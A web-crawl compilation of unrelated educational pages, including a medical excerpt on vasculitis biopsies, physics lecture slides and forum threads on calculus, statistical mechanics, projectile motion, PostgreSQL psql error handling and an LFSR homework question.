Surgical biopsies of radiographically abnormal pulmonary parenchyma, have a diagnostic yield of 90% in patients with granulomatosis with polyangiitis (Wegener's), and play an important role in ruling out infection or malignancy. The yield of lung biopsies is highly associated with amount of tissue that can be obtained, and transbronchial biopsies, while less invasive, have a yield of only 7%. Lung biopsies also play an important role in microscopic polyangiitis, Churg-Strauss syndrome, and in any vasculitic disease where an immunosuppressed patient has pulmonary disease that is suspected to be an infection.
Kidney biopsy findings of a focal, segmental, crescentic, necrotizing glomerulonephritis with few to no immune complexes (pauci-immune glomerulonephritis) are characteristic in patients with granulomatosis with polyangiitis (Wegener's), microscopic polyangiitis, or Churg-Strauss syndrome, who have active renal disease. These findings not only distinguish these entities from other causes of glomerulonephritis, they can confirm the presence of active glomerulonephritis that requires treatment. Because of this, renal biopsies can also be helpful to guide management decisions in these diseases when an established patient has worsening renal function and an inactive or equivocal urine sediment. Cryoglobulinemic vasculitis and Henoch-Schönlein purpura are other vasculitides where renal involvement may occur and where biopsy may be important in diagnosis or prognosis.
Biopsies of the skin are commonly performed and are well tolerated. As not all purpuric or ulcerative lesions are due to vasculitis, skin biopsy plays an important role to confirm the presence of vasculitis as the cause of the manifestation. Cutaneous vasculitis represents the most common vasculitic feature that affects people and can be seen in a broad spectrum of settings including infections, medications, malignancies, and connective tissue diseases. Because of this, for ...
Sign in to your MyAccess Account while you are actively authenticated on this website via your institution (you will be able to tell by looking in the top right corner of any page – if you see your institution’s name, you are authenticated). You will then be able to access your institute’s content/subscription for 90 days from any location, after which you must repeat this process for continued access.
Ok
## Subscription Options
### AccessMedicine Full Site: One-Year Subscription
Connect to the full suite of AccessMedicine content and resources including more than 250 examination and procedural videos, patient safety modules, an extensive drug database, Q&A, Case Files, and more.
|
2014-10-21 02:10:31
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2366647720336914, "perplexity": 6286.722257523489}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507443869.1/warc/CC-MAIN-20141017005723-00133-ip-10-16-133-185.ec2.internal.warc.gz"}
|
http://slideplayer.com/slide/4457976/
|
# Summer School 2007B. Rossetto1 5. Kinematics Piecewise constant velocity t0t0 tntn titi t i+1 x(t) x(t i ) h t x i = v(t i ). h Distance runned during.
## Presentation on theme: "Summer School 2007B. Rossetto1 5. Kinematics Piecewise constant velocity t0t0 tntn titi t i+1 x(t) x(t i ) h t x i = v(t i ). h Distance runned during."— Presentation transcript:
Summer School 2007B. Rossetto1 5. Kinematics Piecewise constant velocity t0t0 tntn titi t i+1 x(t) x(t i ) h t x i = v(t i ). h Distance runned during the time interval v(t i ) is the slope of the segment.
Summer School 2007B. Rossetto2 5. Kinematics Instantaneous velocity t0t0 tntn titi x(t) h t.... - definition of velocity - definition of acceleration t i +h M O
Summer School 2007B. Rossetto3 5. Kinematics Velocity and acceleration Cartesian Polar (cf. chap.1 Coordinates, slide 7)
Summer School 2007B. Rossetto4 5. Particle motion First law of Newton (inertia principle) Define a system (particle, system of particles, solid) Second law (principle) of Newton As a consequence : system with interaction : changes, depending on the inertial mass m:
Summer School 2007B. Rossetto5 5. Motion Extension to variable mass systems Definition of the momentum of the system: 1 st law: principle of conservation of momentum 2 nd law: fundamental law of dynamics
Summer School 2007B. Rossetto6 5. Kinematics Rotational dynamics 1 - Definition of angular momentum: 0 ( and must be evaluated relative to the same point 0) 2 - Fundamental theorem of rotational dynamics: Proof: is the torque of the force generating the movement
Summer School 2007B. Rossetto7 5. Kinematics Motion under constant acceleration (parametric equation of a parabola) Double integration and projection:
Summer School 2007B. Rossetto8 5. Kinematics Fluid friction (2 nd order differential equation with constant coefficients) Example: free fall of a particle in a viscous fluid. t v(t) 0 Limit speed : Speed as a function of time : From the second law : K : shape coefficient (body) : viscosity (fluid)
Summer School 2007B. Rossetto9 5. Kinematics Sliding friction Frictional force characterized by : Example: inclined plane Static coefficient > dynamic coefficient Project the fundamental law of dynamics (2nd Newton law) onto Ox and Oy axes.
Summer School 2007B. Rossetto10 5. Kinematics Uniform circular motion 0 0. and (implies Acceleration: from chap. I Coordinates, slide #7 Definition of uniform circular motion Definition of angular velocity and then (central) ) M Theorem:
Summer School 2007B. Rossetto11 5. Kinematics Motion under central force (1) Example: gravitation.. O(m) P(m’) Theorem slide #5: From the 2 nd Binet law: Sketch of proof: expression of acceleration in polar coordinates: m: gravitational mass, equal to inertial mass (3 rd Newton law)
Summer School 2007B. Rossetto12 5. Kinematics Motion under central force (2). F’ (Origin) F p. c b a M(r,) (ellipse, Origin is one of the focuses F’) A’ Solution of the differential equation..... A
Summer School 2007B. Rossetto13 5. Work and energy Work Definition. Work of a force along a curve : P H Property. If there exists E P such that then is conservative. Potential energy. We define the potential energy of a conservative force vectorfield as a primitive: Kinetic energy. The kinetic energy of a particle of mass m and velocity v is defined as E k =(1/2)mv 2. Energy
Download ppt "Summer School 2007B. Rossetto1 5. Kinematics Piecewise constant velocity t0t0 tntn titi t i+1 x(t) x(t i ) h t x i = v(t i ). h Distance runned during."
Similar presentations
|
2019-11-12 06:53:06
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8740033507347107, "perplexity": 11308.487773627732}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496664752.70/warc/CC-MAIN-20191112051214-20191112075214-00498.warc.gz"}
|
http://mathhelpforum.com/calculus/204897-derivitive-help.html
|
1. ## derivitive help!
Please help! I just can't get through this problem and I really need someone to tell me what I need to do.
The problem is as follows f(x) 1/ (root)x; and we're using the formula of limit as delta x approaches 0; of f(x+deltax) - f(x) / (all over) delta x.; I'm unsure of how to start this problem, so any help would be so useful! thank you!!
2. ## Re: derivitive help!
We are told to use first principles to find the derivative of $f(x)=\frac{1}{\sqrt{x}}$ hence:
$f'(x)\equiv\lim_{\Delta x\to0}\frac{f(x+\Delta x)-f(x)}{\Delta x}=\lim_{\Delta x\to0}\frac{\frac{1}{\sqrt{x+\Delta x}}-\frac{1}{\sqrt{x}}}{\Delta x}$
Your goal is to rewrite the expression so that you can substitute zero for $\Delta x$ and not get division by zero. I would begin by combining the terms in the numerator with a common denominator, then rationalize the resulting numerator. See what you get. Post your work if your get stuck.
|
2017-11-18 10:31:57
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9031959772109985, "perplexity": 406.4917923373961}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934804724.3/warc/CC-MAIN-20171118094746-20171118114746-00311.warc.gz"}
|
https://www.physicsforums.com/threads/microcanonical-ensemble-density-matrix.782954/
|
# Microcanonical ensemble density matrix
Tags:
1. Nov 18, 2014
### Seban87
Ref: R.K Pathria Statistical mechanics (third edition sec 5.2A)
First it is argued that the density matrix for microcanonical will be diagonal with all diagonal elements equal in the energy representation. Then it is said that this general form should remain the same in all representations. i.e all the off diagonal elements zero and the diagonal elements all equal to one another.
This is my question. Why should the form necessarily be the same in all representations? To say that all diagonal elements (in any representation) are equal means that the probabilities for measuring all eigenvalues of any operator is the same. We may argue that the probability for measuring any energy eigenvalue within the specified range is the same (based on equal a priori probabilities).
2. Nov 18, 2014
### atyy
Pathria doesn't say that. He says in other representations the density matrix is not diagonal. He does say it will still be symmetric.
3. Nov 19, 2014
### Seban87
Thanks. But Pathria does say it. Please refer to page 119,120 in statistical mechanics third edition by Pathria. These pages correspond to section 5.2. It is given so in other editions too. (page 118 in first edition, page 108 in second edition)
In 119,
\rho_{mn} = \rho_n \delta_{mn} ------- (1)
\rho_n = 1/ \Gamma for each of the accessible states
0 for all other states.
In page 120,
"The density matrix in the energy representation is then given by equations (1) and (2)." If we now change over to any other representation, the general form of the density matrix should remain the same, namely (i) the off-diagonal elements should continue to be zero, while (ii) the diagonal elements (over the allowed range) should continue to be equal to one another."
In fact he invokes the postulate of random a priori phases to ensure the nondiagonal elements zero. Is it valid for eigenstates of any operator or just the energy eigenstates?
Last edited: Nov 19, 2014
4. Nov 19, 2014
### atyy
I see. I looked up http://ocw.mit.edu/courses/physics/8-333-statistical-mechanics-i-statistical-mechanics-of-particles-fall-2007/lecture-notes/lec21.pdf [Broken] (p136) and http://www.jamia-physics.net/lecnotes/statmech/lec09.pdf (p2) and it seems the random phase assumption is applied in the energy basis.
Last edited by a moderator: May 7, 2017
5. Nov 19, 2014
### Seban87
Yes, I found the postulate of random phases being applied to energy representation else where too. But Pathria has the density matrix automatically diagonal in energy basis and makes it diagonal in all other basis by applying this postulate. This is what I find confusing. In lecture 9 of the link you gave it is said that the energy eigenstates have a special status by this postulate...
6. Nov 19, 2014
### Seban87
What I find most confusing is the equality of the diagonal elements of density matrix in all representations. I am not able to understand this.
7. Nov 19, 2014
### kith
If the off-diaganol elements are all zero and the diagonal elements are all equal, your density matrix is proportional to the identity matrix. The identity matrix can be decomposed into eigenstates of any observable, so the density matrix looks the same for all observables.
From a statistical / information-theoretic point of view, such a density matrix corresponds to a situation where you know nothing about your system. So you just assign equal probabilities to all possible (pure) states.
Also for really high temperatures, the density matrix of all systems approximately has this form. For $T \rightarrow \infty$, the Boltzmann factors $$\exp\left(-\frac{E_n}{kT} \right)$$ become all equal to $1$, so the equilibrium density matrix is -up to a normalization constant- equal to the identity matrix.
I don't know the exact context of your question because I don't have the book.
Last edited: Nov 19, 2014
8. Nov 19, 2014
### Seban87
That's right. But The density matrix is made diagonal in this book by invoking the postulate of random phases. The diagonal elements are said to be equal due to the postulate of equal a priori probabilities. My question then is this. Does the postulate of equal a priori probabilities imply that the all eigenstates of any operator have the same probabilities? Or is it a statement about energy eigenstates only?
I understand what you said. But do we know a priori that the density matrix for microcanonical ensemble is proportional to the identity matrix? This is what Pathria seems to imply. Wouldn't it depend on the states of the system and the basis chosen?
9. Nov 20, 2014
### vanhees71
I think, this book by Pathria is pretty enigmatic, although I've not looked at it in great detail. A clear distinction between abstract Hilbert-space vectors and representations, is mandatory for a well-understandable derivation. I can just copy my answer of a private communication with the OP:
I don't understand what Pathria is saying in the beginning of this section at all. Let's tranlate it to the usual notation of quantum statistics. The microcanonical ensemble is correctly described in words: It's a closed system of fixed particle number and volume and an energy in a finite (!) interval $E \in (E_0-\Delta/2,E_0+\Delta/2)$. Now let's assume a system with a continuous energy spectrum as is usual for, e.g., an ideal gas. Then the microcanonical statistical operator is
$$\hat{\rho}=\frac{1}{\Delta} \int_{E_0-\Delta/2}^{E_0+\Delta/2} \mathrm{d} E |E \rangle \langle E|.$$
In general, if written in another basis, it's not diagonal anymore. Why should it be?
The statistical operator of a pure state is
$$\hat{\rho}_{\psi}=|\psi \rangle \langle \psi|,$$
where $|\psi \rangle$ is normalized to 1. Of course $\hat{\rho}_{\psi}$ is a projection operator, and any positively semidefinite self-adjoint operator with trace 1 represents a pure state if and only if it's a projection operator. It's of course also only diagonal in this one representation and not for any basis.
I don't understand the notation of Eq. (5) in the book. Wrt. to an arbitrary basis $|u_n$ the matrix elements are
$$\rho_{\psi n_1n_2}=\langle u_{n_1}|\hat{\rho}_{\psi}|u_{n_2} \rangle=\psi(n_1) \psi^*(n_2),$$
where
$$\psi(n)=\langle u_n |\psi \rangle.$$
So I guess that's what he means with $a_n$ in his strange notation.
10. Nov 20, 2014
### kith
If it worked, the argument would go like this
$$\rho = \sum_n p |E_n\rangle \langle E_n| = p \sum_n |E_n\rangle \langle E_n| = p 1 = p \sum_i |a_i\rangle \langle a_i| = \sum_i p |a_i\rangle \langle a_i$$
where $|a_i\rangle$ are the eigenstates of an arbitrary observable $A$.
But reading vanhees post, I realized that I wasn't talking about the microcanonical ensemble at all. Since there's only a small number of energy eigenstates present in the mixture, we are far from getting the identity matrix. I too think that the statement is false.
Last edited: Nov 20, 2014
11. Nov 20, 2014
### vanhees71
No! The sum over $n$ is of course not complete, because then you'd have $\hat{\rho} \propto \hat{1}$, which is the probability distribution for complete ignorance and doesn't make sense at all, because you can not normalize its trace to 1 (except if you are in a finite dimensional space of states like for a spin observable or something similar).
For a discrete momentum spectrum (e.g., a particle or many particles in an harmonic oscillator potential), the whole thing is easier than my example. Then you have
$$\hat{\rho}_{\text{micro}}=\frac{1}{N} \sum_{k=1}^{N} |E_k \rangle \langle E_k|.$$
This is motivated from an information theoretical point of view by maximizing the entropy for the case that you know that the energy of your system takes one of the values $\{E_1,\ldots ,E_N \}$ but for sure not one of the values $E_k$ with $k \in \{N+1,N_2,\ldots\}$.
Then in any other basis $|a_i \rangle$ you have
$$\rho_{\text{micro} ij}=\langle a_i |\hat{\rho}_{\text{micro}}|a_j \rangle = \frac{1}{N} \sum_{k=1}^{N} \langle a_i|E_k \rangle \langle E_k|a_j \rangle.$$
The matrix in the representation wrt. to the new basis is not necessarily diagonal!
Last edited: Nov 20, 2014
12. Nov 20, 2014
### kith
Yes, that assumption was implicit in my equation. So it's a bad equation for two reasons, thanks for pointing it out.
13. Nov 20, 2014
### Seban87
Yes. It is now that Pathria invokes the postulate of random phases to make it diagonal. The average of $$c_n c_m ^*$$becomes zero due to random phases among of the states. ie.
$$\langle c_n c_m^* \rangle = c_nc_m^* \langle e^{i(\theta_n - \theta_m)} \rangle = c_n c_m^* \delta_{nm}= |c_n|^2.$$.
In order to make all diagonal elements equal the postulate of equal a priori probabilities is invoked. Thus $$|c_n|^2 = |c|^2$$ for all n.
Is the postulate of random phases true for eigenstates of all operators or just energy eigen states?
Does the postulate of equal a priori probabilities say that all eigenstates of any operator are equally probable to be realized under a measurement? I think the question boils down to the validity and exact meaning of these to statements.
Last edited: Nov 21, 2014
14. Nov 21, 2014
### Seban87
In a correspondence with one of my professors I understand that observables cannot distinguish states within the microcanonical subspace. So the density matrix in this subspace is always going to be proportional to the identity matrix.
Also I see that what vanhees71 says here has to be applicable to eigenvectors of all other operators too. So all of them have to be taken to be equally probable. This, I think, explains the fact that all diagonal elements have to be equal. Now the random phases resulting from interactions with the external world would make sure that all nondiagonal elements are zero. Conclusion: The density matrix in the microcanonical subspace is always proportional to the identity matrix.
15. Nov 22, 2014
### vanhees71
No! You know something about the system, when considering the microcanonical ensemble, namely that the energy is for sure in a certain interval, and this makes the energy eigenstates special and that's why, according to the maximum-entropy principle, the statistical operator is diagonal in the energy-eigenbasis and that the states with the eigenvalues in the given interval are equally probable and all others have 0 probability. This does not imply that the same is the case of any other observable and that's why the statistical operator of the microcanonical ensemble is usually not diagonal wrt. the eigenstates of another observable!
Another thing is, when you measure an observable and find it to be in a certain interval. Then, due to decoherence via interactions of the quantum system with the measurement apparatus and/or "the environment" the phases are averaged out, and you assign another statistical operator, again using the maximum entropy principle, adapted to the new knowledge you gained through the measurement of the observable. If this observable is not compatible with the energy (i.e., if it is not a conserved quantity) the new statistical operator is no longer a microcanonical statistical operator.
16. Nov 25, 2014
### Seban87
Here is another explanation from a correspondence with one of the authors. Now this seems simple. If the density matrix is proportional to the identity matrix in the energy representation then it has to be so in any other representation. This is because the matrices in different bases have to be connected by unitary transformations and the unitary transformation of a matrix proportional to identity matrix will give the same matrix. (That is as long as we are confined to the microcanonical subspace.
17. Nov 25, 2014
### vanhees71
The canonical density matrix is not proportional to the identity operator. In general, the identity operator cannot be a statistical operator at all, because it hasn't finite trace (except you are in a finitely-dimensional Hilbert space; then it still refers to the minimal possible information possible and not to the microcanonical ensemble, where the energy is known to be in a certain (small) range of possible values).
18. Nov 25, 2014
### Seban87
Not the Canonical density matrix. I was referring solely to microcanonical ensemble.
19. Nov 25, 2014
### Seban87
Let us see what goes wrong in the following reasoning.
1)
2)
So in the energy representation, the microcanonical density matrix has the following form. $$\rho_{m,n} = \frac{1}{N} \delta_{m,n}$$. Clearly here it is proportional to the identity operator.
Now the representation in any other representation has to be related to this matrix by a unitary transformation. Making a Unitary transformation of this matrix will again give us the same form, won't it?, because the unitary transformation of the identity matrix is again the identity matrix.
So, doesn't this reasoning imply that it has to be proportional to the identity matrix in any representation? If not what has gone wrong in the above?
20. Nov 25, 2014
### Seban87
Perhaps this whole thing is true for a discrete basis...
Know someone interested in this topic? Share this thread via Reddit, Google+, Twitter, or Facebook
|
2017-10-17 21:34:46
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8659231662750244, "perplexity": 402.9221559616408}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187822488.34/warc/CC-MAIN-20171017200905-20171017220905-00499.warc.gz"}
|
https://www.mail-archive.com/pgsql-patches@postgresql.org/msg07649.html
|
Re: [HACKERS] [PATCHES] Continue transactions after errors in psql
Richard Huxton <dev@archonet.com> writes:
> Michael Paesold wrote:
>> I just don't see why non-interactive mode does need such a switch
>> because there is no way to check if there was an error. So just put two
>> queries there and hope one will work?
> DROP TABLE foo;
> CREATE TABLE foo...
Unconvincing. What if the drop fails for permission reasons, rather
than because the table's not there? Then the CREATE will fail too
... but now the script bulls ahead regardless, with who knows what
I would far rather see people code explicit markers around statements
whose failure can be ignored. That is, a script that needs this
behavior ought to look like
BEGIN;
\begin_ignore_error
DROP TABLE foo;
\end_ignore_error
CREATE ...
...
COMMIT;
where I'm supposing that we invent psql backslash commands to cue
the sending of SAVEPOINT and RELEASE-or-ROLLBACK commands. (Anyone
got a better idea for the names than that?)
Once you've got such an infrastructure, it makes sense to allow an
interactive mode that automatically puts such things around each
statement. But I can't really see the argument for using such a
behavior in a script. Scripts are too stupid.
regards, tom lane
|
2018-05-26 01:08:03
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7629142999649048, "perplexity": 8298.635482695949}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794867254.84/warc/CC-MAIN-20180525235049-20180526015049-00394.warc.gz"}
|
https://www.physicsforums.com/threads/firing-cannons-projectile-motion.750859/
|
# Firing cannons projectile motion
1. Apr 26, 2014
### Psychros
1. The problem statement, all variables and given/known data
A cannonball is fired with initial speed v0 at an angle 30° above the horizontal from a height of 38.0 m above the ground. The projectile strikes the ground with a speed of 1.3v0. Find v0. (Ignore any effects due to air resistance.)
2. Relevant equations
Time= 0=v0T-½gT2 T<0
t= (vOy+√(vOy2-2gy))/g
distance/range x=x0+V0xt
x/y velocity- v0x=Vcos(θ); v0y=vsin(θ)
3. The attempt at a solution
This is a practice problem (with different values than original), and the provided answer is 32.9m/s
i set the origin at the cannon
Since the velocity magnitude = √(Vcos(θ)2+Vsin(θ)2)
I tried variations along the line of V0cos(30)2+V0sin(30)2= 1.3 V02
in order to split the velocity into xy components.
Conceptually i understand it takes him -38m to reach 1.3 times his original velocity, but in trying to plug the provided data into the equations i end up with too many variables.
Any and all help very appreciated, thank you.
2. Apr 26, 2014
### SteamKing
Staff Emeritus
I'm not sure what you are trying to do here. The angle at which the projectile strikes the ground may not be equal to the initial firing angle, i.e. 30 degrees.
The best way to approach this problem is to find the maximum altitude which the projectile reaches after it is fired. At this point, the vertical component of the velocity is zero. After reaching the maximum altitude, the projectile falls under the force of gravity. Knowing the magnitude of the final velocity, you should be able to determine the duration of the fall and the resulting vertical velocity component. Remember, since there is no air resistance, the horizontal component of the velocity remains unchanged during the entire flight of the projectile.
3. Apr 26, 2014
### Psychros
That is brilliant, thank you. However, Without knowing distance (x), time, or hard value for velocity (since it's expressed as a relation to the initial velocity) i'm not sure how to go about this.
4. Apr 26, 2014
### SammyS
Staff Emeritus
Try using conservation of energy.
5. Apr 26, 2014
### Psychros
Hmmm I don't think we've learned that yet..
6. Apr 26, 2014
### SammyS
Staff Emeritus
In that case,
What can you conclude about the x component of the velocity?
What kinematic equations do you know regarding the vertical component of the velocity ?
7. Apr 26, 2014
### Psychros
X component will be the same through it's entirety.
y=y0+v0y(t)+½at2
or
Vy=V0y+gt
Vy=1.3V0y-9.81t
But Theoretically if we were starting at the maximum, V0y would = 0,
Vy/-9.81=t?
I'm getting stuck down either avenue, I do think i'm missing something intuitive here..
8. Apr 26, 2014
### SammyS
Staff Emeritus
vy ≠ 1.3 v0y . I'm assuming that you mean vy to be the y component of the final velocity.
How is speed obtained from components of velocity ?
Also, there's another kinematic equation. One that doesn't involve time, t.
Edited:
[STRIKE](vy)2 = (v0y)2 - g(Δy)[/STRIKE]
(vy)2 = (v0y)2 - 2g(Δy)
Last edited: Apr 27, 2014
9. Apr 27, 2014
### Psychros
Do you mean speed as in magnitude of velocity?
Also, should (vy)2 = (v0y)2 - g(Δy)
have a -2g(Δy)?
I apologize for being slow, but i'm not sure how to use this either since I don't know the change in height from the maximum
10. Apr 27, 2014
### SammyS
Staff Emeritus
Right. There should be a 2 in there.
Then, ...
How is speed obtained from components of velocity ?
11. Apr 27, 2014
### Psychros
Since speed is the magnitude of velocity,
by components of velocity I imagine you mean Vx and Vy,
or √(Vcos(θ)2+Vsin(θ)2)?
12. Apr 27, 2014
### SammyS
Staff Emeritus
Yes. Of course, sin2(θ) + cos2(θ) = 1
Anyway, $\ v_0=\sqrt{(v_{0x})^2+(v_{0y})^2}\ ,\$ so that $\ (v_0)^2=(v_{0x})^2+(v_{0y})^2\ .\$
And in general $\ v^2=(v_{x})^2+(v_{y})^2\ .\$ Right?
Now, what do you know regarding the x component of velocity for this projectile?
13. Apr 27, 2014
### Psychros
sorry, that's what i meant when i put √(V0cos(θ)2+V0sin(θ)2), that it's = V0.
I know that it doesn't change, but i'm not sure how to find its' magnitude in this situation.
14. Apr 27, 2014
### SammyS
Staff Emeritus
So then $v_{0x}=v_x\$ .
Regarding your kinematic equation with the $(v_{y})^2\,$, what is it missing for it to have v2 and v02 in it ?
|
2018-02-19 21:01:56
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6734117865562439, "perplexity": 1511.3690999145908}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891812788.42/warc/CC-MAIN-20180219191343-20180219211343-00784.warc.gz"}
|
https://www.physicsforums.com/threads/pre-calc-word-problem-parabolic-archway.394810/
|
# Homework Help: Pre calc word problem Parabolic archway
1. Apr 12, 2010
### unrealmatt3
1. The problem statement, all variables and given/known data
A Parabolic archway is 12 meters high at the vertex, at a height of 10 meters, the width of the archway is 8 meters. How wide is the archway at ground level?
2. Relevant equations
given in the picture it has (-4,10) and (4,10) along with vertex (0 ,12)
3. The attempt at a solution
(y- 12)^2 =4p(x - 0)
12 = 4p(0) p = 3 ?? I dont know if i need this
i have a picture but not sure what i need to do
2. Apr 13, 2010
### rl.bhat
Hi unrealmatt3, welcome to PF.
Consider vertex as the origin.
The equation of the parabola becomes
y^2 = 4*p*x.
In the first position x = (12 - 10) and y = 4. Find p.
In the second position x = 12. p is known. find y.
2y will give you the required result.
3. Apr 13, 2010
### unrealmatt3
hey thank rl.bhat for the welcome.
so i think i got it... first 16=4*P(x) where x=2 therefor P = 2
2nd y^2=4(2)(12)
Y^2 = 96
y=4 $$\sqrt{6}$$
then 2y = 19.6 meters
4. Apr 13, 2010
### rl.bhat
That is right.
|
2018-12-11 16:59:29
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4031599760055542, "perplexity": 3238.5997069218365}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376823657.20/warc/CC-MAIN-20181211151237-20181211172737-00618.warc.gz"}
|
https://crypto.stackexchange.com/questions/89061/listing-first-8-bits-generated-by-lfsr
|
# Listing first 8 bits generated by LFSR
Consider the primitive polynomial P(x) = x^4 + x^3 + 1, initialized with the bit string (shifting occurs from left to right, were the right-most bit represents the LFSR output): 1101.
List the first 8-bits generated by the LFSR, starting with the bit 1 that is the right-most bit of the initialization sequence above.
This was my work to solve this:
s1 s2 s3 s4 output (s4 xor s3)
[[ 1 0 1 1 0
0 1 0]] 1 1
1 0 1 0 1
1 1 0 1 1
1 1 1 0 1
1 1 1 1 0
0 1 1 1 0
0 0 1 1 0
The answer is : 10110010. Is this because it is in result of what I have put in brackets?
• Questions asking for solutions to crypto puzzles or homework exercises are off-topic. While we do accept questions about homework problems, such questions must contain more than just a verbatim copy of the assignment, and should preferably ask for general solving techniques rather than just a solution to a specific puzzle or exercise – kodlu Mar 26 at 20:55
A few things have gone wrong:
1. You've reversed the initial state, but continued to shift from left to right. If you do reverse then the shift is from right to left.
